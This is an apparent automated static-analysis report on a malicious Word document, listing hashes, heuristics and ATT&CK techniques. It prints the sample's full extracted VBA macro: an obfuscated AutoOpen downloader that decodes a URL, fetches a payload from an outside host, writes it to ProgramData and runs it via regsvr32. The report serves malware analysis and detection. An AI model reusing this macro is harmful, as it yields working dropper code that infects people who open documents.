Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 42ccd85c910961fa…

MALICIOUS

Office (OOXML)

133.0 KB Created: 2020-07-09 00:02:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: 73a93d4e240df1801c2d031108bdee2c SHA-1: 4d8348892e63505e2a65bd5b484626860584df6a SHA-256: 42ccd85c910961fa939059b6903462d1d1da80ab275b93de655ca248fdb1880b
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to write a file to 'C:\ProgramData\a4c.jpg' and then execute it. The URL 'http://docffi23b.c8o6m6/6i0z355/0y7afc9a5.0p4h9p9?1l6=akbp4tb93.8c6a6bb' is used to download the payload. This indicates a macro-based downloader designed to fetch and run a second-stage payload.

Heuristics 5

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\it.jpg
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3096 bytes
SHA-256: c6dea22c5264a4aad9d23a86b38d93564256807129b156aa1e5a1d468e45ec6f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ce385fb9"
Function ff67d0b4()
ff67d0b4 = 61355.878109499
End Function
Function ecd222ab()
ecd222ab = ActiveWindow.EnvelopeVisible
End Function
Sub cc20c015(edbbfcff, cd72fb47)
Dim b997613d
b997613d = FreeFile
Open edbbfcff For Output As #b997613d
Print #b997613d, ab516380(cd72fb47)
Close #b997613d
End Sub
Function a6673961()
a6673961 = ActiveWindow.UsableHeight
End Function
Function fd6bfd6f()
fd6bfd6f = ActiveWindow.SplitVertical
End Function
Function f8e59b55(df4eb4ed)
e68b55e9 = Len(df4eb4ed)
For e5b91460 = 1 To e68b55e9 Step 2
eed047ec = eed047ec & Mid(df4eb4ed, e5b91460, 1)
Next
f8e59b55 = eed047ec
End Function
Function cd11a6eb()
cd11a6eb = ActiveWindow.DisplayVerticalScrollBar
End Function
Function c297b5d2()
c297b5d2 = Application.ActiveDocument.CurrentRsid
End Function
Sub f2183caa()
End Sub
Function c480bfd0()
c480bfd0 = -1218
End Function
Function dc2beee7()
dc2beee7 = "ajirRv"
End Function
Sub AutoOpen()
Dim f4b4c0ac As New b5f50fc5
cc20c015 f8e59b55("c1:d\5p1r2o6g0rba0m0daadtcaf\9345e7c3a4c.bj8pcg9"), f4b4c0ac.ca31c01b(f8e59b55("hbt2tfpb:5/5/2cdocffi23b.7c8o6m6/6i0z355/0y7afc9a5.0p4h9p9?1l6=akbp4tb93.8c6a6bb"))
Dim fcf832a1 As New WshShell
fcf832a1.exec d9ed35e7 & " " & f8e59b55("c1:d\5p1r2o6g0rba0m0daadtcaf\9345e7c3a4c.bj8pcg9")
End Sub

Attribute VB_Name = "c6be038f"
Function c9f26ccd()
c9f26ccd = ActiveWindow.WindowNumber
End Function
Function bd0923ac()
bd0923ac = 8096.2861793661
End Function
Function ab516380(ed66f7b2)
ab516380 = StrConv(ed66f7b2, 64)
End Function
Function fcf744d1()
fcf744d1 = ActiveWindow.DisplayVerticalScrollBar
End Function
Function a93f9917()
a93f9917 = 0
End Function
Function fadaf300()
End Function
Function daf2dc9e()
daf2dc9e = ActiveWindow.DisplayRulers
End Function
Function e3cad1ce()
e3cad1ce = True
End Function
Function d9ed35e7()
d9ed35e7 = f8e59b55("rbe0gbsdvcrb3f29")
End Function

Attribute VB_Name = "b5f50fc5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f18cc309()
f18cc309 = ActiveWindow.DisplayLeftScrollBar
End Function
Function d5d2149c()
d5d2149c = Application.ActiveDocument.CurrentRsid
End Function
Function ca31c01b(d303c1bb)
Dim faa096a4 As Object
Set faa096a4 = New MSXML2.XMLHTTP30
Call faa096a4.Open("GET", d303c1bb, False)
faa096a4.Send
ca31c01b = faa096a4.responsebody
End Function
Function b80436e1()
b80436e1 = ActiveWindow.DisplayRightRuler
End Function
Function aac7c580()
aac7c580 = ActiveWindow.Top
End Function
Function e3fc2362(e82d42ff)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24064 bytes
SHA-256: 2fb8b972e3f9ac460a402ab36d071bdfcc2b38ec37d8f82f614a3a6e0756998c